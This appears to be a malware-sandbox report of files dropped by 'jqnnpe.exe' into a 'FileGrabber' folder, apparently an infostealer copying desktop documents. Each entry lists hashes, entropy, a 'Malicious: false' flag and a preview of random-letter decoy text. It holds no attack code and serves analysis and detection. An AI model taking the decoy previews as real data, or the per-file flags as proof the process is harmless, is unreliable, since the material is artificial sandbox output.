Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Roaming\134349\FileGrabber\Desktop\HTAGVDFUIE.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\jqnnpe.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Reputation:	unknown
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Roaming\134349\FileGrabber\Desktop\KATAXZVCPS.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\jqnnpe.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Reputation:	unknown
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Roaming\134349\FileGrabber\Desktop\KZWFNRXYKI.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\jqnnpe.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694982189683734
Encrypted:	false
SSDEEP:	24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
MD5:	E49F84B05A175C231342E6B705A24A44
SHA1:	41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
SHA-256:	EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
SHA-512:	84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
Malicious:	false
Reputation:	unknown
Preview:	KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

C:\Users\user\AppData\Roaming\134349\FileGrabber\Desktop\LTKMYBSEYZ.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\jqnnpe.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Reputation:	unknown
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Roaming\134349\FileGrabber\Desktop\NIKHQAIQAU.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\jqnnpe.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690394987545919
Encrypted:	false
SSDEEP:	24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
MD5:	CA901F8E74EB7955CF06A00BD424C0C2
SHA1:	0876F92A018E8AB57F666FBB048B1CD028607A38
SHA-256:	6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
SHA-512:	7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
Malicious:	false
Reputation:	unknown
Preview:	NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ

C:\Users\user\AppData\Roaming\134349\FileGrabber\Desktop\NWTVCDUMOB.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\jqnnpe.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696250160603532
Encrypted:	false
SSDEEP:	24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
MD5:	2B6A90B7D410E3A4E2B32C90D816B4FE
SHA1:	B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
SHA-256:	D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
SHA-512:	03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
Malicious:	false
Reputation:	unknown
Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Roaming\134349\FileGrabber\Desktop\ONBQCLYSPU.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\jqnnpe.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Reputation:	unknown
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Roaming\134349\FileGrabber\Desktop\ONBQCLYSPU.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\jqnnpe.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699434772658264
Encrypted:	false
SSDEEP:	24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
MD5:	02D3A9BE2018CD12945C5969F383EF4A
SHA1:	085F3165672114B2B8E9F73C629ADABBF99F178D
SHA-256:	6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
SHA-512:	A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
Malicious:	false
Reputation:	unknown
Preview:	ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD

C:\Users\user\AppData\Roaming\134349\FileGrabber\Desktop\UMMBDNEQBN.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\jqnnpe.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Reputation:	unknown
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Roaming\134349\FileGrabber\Desktop\UMMBDNEQBN.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\jqnnpe.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Reputation:	unknown
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFN